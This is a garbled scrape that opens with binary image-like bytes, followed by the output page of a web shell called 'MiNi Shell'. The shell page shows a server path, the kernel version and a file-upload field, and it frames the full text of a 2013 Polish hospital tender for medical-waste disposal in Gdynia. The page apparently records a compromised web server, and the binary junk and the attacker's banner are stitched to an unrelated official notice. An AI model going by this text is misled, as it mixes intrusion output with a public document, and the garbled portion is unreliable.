JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130801/308310-N-2013.html

<p class="kh_header"><b>Gdynia: Przetarg nieograniczony na świadczenie usług odbioru, transportu i unieszkodliwiania odpadów medycznych wraz z dzierżawą kontenera z agregatem chłodniczym</b><br>
<b>Numer ogłoszenia: 308310 - 2013; data zamieszczenia: 01.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Morski im. PCK , ul. Powstania Styczniowego 1, 81-519 Gdynia, woj. pomorskie, tel. 058 6998127, faks 058 6998338.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-morski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na świadczenie usług odbioru, transportu i unieszkodliwiania odpadów medycznych wraz z dzierżawą kontenera z agregatem chłodniczym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług odbioru, transportu i unieszkodliwiania odpadów medycznych pochodzących z działalności służb medycznych oraz związanych z nią badań, w ilości ca 242 220 kg w ciągu 24 miesięcy, w tym:

1) Kod 18 01 02*- 10 000 kg w ciągu 24 miesięcy: części ciała i organy oraz pojemniki na krew i konserwanty służące do jej przechowywania z wyłączeniem 180103,
2) Kod 18 01 03* - 220 000 kg w ciągu 24 miesięcy: inne odpady zawierające drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przenoszenia mat. genetycznego, o których wiadomo lub co, do których istnieją wiarygodne podstawy, że wywołują choroby u ludzi i zwierząt (np. zainfekowane pieluch majtki, podpaski, podkłady) z wyłączeniem 180180 i 180182,
3) Kod 18 01 06 - 100 kg w ciągu 24 miesięcy: chemikalia zawierajace substancje niebezpieczne, 
4) Kod 18 01 07 - 20 kg w ciągu 24 miesięcy: pozostałości po lekach recepturowych,
5) Kod 18 01 08* - 12 000 kg w ciągu 24 miesięcy: leki cytotoksyczne i cytostatyczne,
6) Kod 18 01 09 - 100 kg w ciągu 24 miesięcy:leki inne niż wymienione w 180108
* odpady niebezpieczne

oraz zapewnienie warunków do magazynowania przez zamawiającego odpadów do czasu ich odbioru, tj. wstawienie (wydzierżawienie) kontenera z agregatem chłodzącym do magazynowania odpadów, w tym jego mycie, dezynfekcje oraz naprawy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.52.42.00-8, 90.52.44.00-0, 90.51.33.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
1. posiada aktualne zezwolenie na prowadzenie działalności w zakresie gospodarowania odpadami medycznymi tj. zbierania, transportu oraz unieszkodliwiania pozyskiwanych odpadów niebezpiecznych o kodach 180102*, 180103*, 180106, 180107, 180108*, 180109, 
2. przedstawi wymagany dokument - oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
1. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie, co najmniej 2 usługi odbioru, transportu i unieszkodliwiania odpadów medycznych wraz z wstawieniem kontenera- chłodni do magazynowania odpadów, o wartości nie mniejszej niż 200 000,00 zł brutto każda,
2. przedstawi wymagany dokument - oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
1. będzie dysponował zakładem utylizacji odpadów niebezpiecznych, w którym unieszkodliwiane będą odpady objęte niniejszym zamówieniem o mocy przerobowej, co najmniej 120 000 kg odpadów rocznie, spełniającym wymogi art. 20 ustawy o odpadach oraz posiadajacym aktualne decyzje uprawnionego organu na użytkowanie i eksploatację zakładu utylizacji,
2. będzie dysponował, co najmniej 2 środkami transportu przystosowanymi do przewozu odpadów niebezpiecznych o załadunku minimum 1 500 kg każdy spełniającymi wymagania w tym zakresie, 
3. przedstawi wymagany dokument - oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
1. będzie dysponował minimum 2 osobami zdolnymi do wykonania zamówienia tj. kierowcami z odpowiednimi zaświadczeniami ADR - o ukończeniu kursu dla osób przewożących towary niebezpieczne,
2. przedstawi wymagany dokument - oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
1. jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 200 000,00 PLN,
2. przedstawi wymagany dokument - oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagane oświadczenia i dokumenty:
W  celu wykazania spełnienia przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy do oferty należy dołączyć:
1.1.  oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik nr 1 do SIWZ;                            
1.2. aktualne zezwolenie na prowadzenie działalności w zakresie zbierania, transportu oraz unieszkodliwiania pozyskiwanych odpadów niebezpiecznych o kodach 180102*, 180103*, 180106, 180107, 180108*, 180109,                                                                    
1.3. Wykonawca jest zobowiązany wykazać, że wykonał w sposób należyty, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - wykonuje należycie w tym okresie minimum 2 usługi odbioru, transportu i unieszkodliwiania odpadów medycznych wraz z wstawieniem kontenera-chłodni do magazynowania odpadów o wartości nie mniejszej niż 200 000,00 zł brutto każda, z podaniem ich wartości, przedmiotu, daty wykonania i odbioru oraz załączeniem dokumentów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie (zał. nr 3 do SIWZ)
1.3.A. Za usługi odpowiadające swoim rodzajem przedmiotowi zamówienia Zamawiający uzna zamówienia związane z realizacją usług polegających na świadczeniu usługi odbioru, transportu i unieszkodliwiania odpadów medycznych wraz z wstawieniem kontenera-chłodni do magazynowania odpadów.
1.3.B. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi:
a) oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik nr 1 do SIWZ;
b) wykaz wykonanych usług zgodnie z wymogiem określonym w pkt 1.3. (załącznik nr 3 do SIWZ) wraz z dowodami potwierdzającymi, że te usługi zostały/są wykonane należycie (były /są wykonywane prawidłowo i z należytą starannością).
Dowodami, o których mowa w pkt. b) są:
1) poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert,
2) w przypadku zamówień na usługi - oświadczenie wykonawcy, - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt. 1)
1.4. wykaz osób, które będą uczestniczyć w realizacji zamówienia minimum 2 osoby zdolne do wykonania zamówienia tj. kierowcy z odpowiednimi zaświadczeniami ADR - o ukończeniu kursu dla osób przewożących towary niebezpieczne, wraz z informacjami na temat ich kwalifikacji zawodowych oraz informacją o podstawie dysponowania tymi osobami - wg wzoru na załączniku nr 5 do SIWZ
1.5. oświadczenie o dysponowaniu zakładem utylizacji odpadów niebezpiecznych wraz ze wskazaniem tego zakładu, w którym unieszkodliwiane będą odpady objęte niniejszym zamówieniem o mocy przerobowej, co najmniej 120 000 kg odpadów rocznie wraz z informacją o podstawie dysponowania tym zakładem,
1.6. wykaz środków transportu co najmniej 2 środki transportu przystosowane do przewozu odpadów niebezpiecznych o załadunku minimum 1 500 kg każdy spełniających wymagania w tym zakresie, przystosowanych do przewozu odpadów niebezpiecznych wraz z informacją o podstawie dysponowania tymi zasobami - załącznik nr 4 do SIWZ, 
1.7. opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 200 000,00 PLN;                                                 

W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia do oferty należy przedłożyć:
1.8. aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy;
1.9. oświadczenie o braku podstaw do wykluczenia z postępowania - załącznik nr 2 do SIWZ;
1.10. listę podmiotów należących do tej samej grupy kapitałowej, co Wykonawca (zgodnie z art. 26 ust 2d. Pzp w związku z art. 24 ust. 2 pkt 5 Pzp) lub informację o tym, że Wykonawca nie należy do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331 z późn. zm.) - zgodnie z treścią załącznika nr 7 do niniejszej SIWZ.

2. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w ust. 1 pkt. 1.8. i 1.9. 
3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej przedkłada dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości- wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

4. Do oferty należy dołączyć również: 
4.1. dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych,                                                                                           4.2. pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - jeśli dotyczy.  
4.3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt 5 kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.

5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: (dotyczy również spółek cywilnych i konsorcjum):
5.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
5.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika i w ofercie składają pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego dla ustanowionego przez nich pełnomocnika.
5.3  Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.
5.4. Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy, wymienione w pkt 1.1. SIWZ, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dopuszczalne jest złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia przez ustanowionego przez nich pełnomocnika. 
5.5. Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, wymienione w pkt 1.2.-1.7. SIWZ, składają ci z wykonawców wspólnie ubiegających się o udzielenie zamówienia, których one dotyczą. 
Warunek określony w § 4 ust. 4. SIWZ powinien spełniać każdy z Wykonawców samodzielnie.
5.6. Dokumenty potwierdzające brak podstaw do wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, wymienione w pkt 1.8.- 1.10., składają ci z wykonawców wspólnie ubiegających się o udzielenie zamówienia, których one dotyczą, przy czym wymóg ten powinien spełniać każdy z Wykonawców samodzielnie i winien to potwierdzić odpowiednimi dokumentami i oświadczeniami.
5.7. Wykonawcy składający wspólną ofertę, ponoszą solidarną odpowiedzialność za zobowiązania Wykonawcy, wynikające z umowy, której projekt zawiera załącznik nr 6 do SIWZ.
5.8  Jeżeli w postępowaniu zostanie wybrana oferta wykonawców, o których mowa w pkt. 5.1., 
Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.

6. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustaw, zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w § 7 ust. 1 pkt 1.7. SIWZ oraz dokumentów wskazujących na: zakres dostępnych wykonawcy zasobów innego podmiotu, sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu tego zamówienia, charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szpital-morski.pl/index.php/ogloszenia/zamowienia-publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W/w strony internetowej oraz w Szpitalu Morskim im. PCK, ul. Powstania Styczniowego 1, 81-519 Gdynia w Dziale Zamówień Publicznych - budynek nr 6 pokój nr 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2013 godzina 11:00, miejsce: Szpital Morski im. PCK, ul. Powstania Styczniowego 1, 81-519 Gdynia budynek nr 6: Kancelaria Szpitala lub Dział Zamówień Publicznych pokój nr 29.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com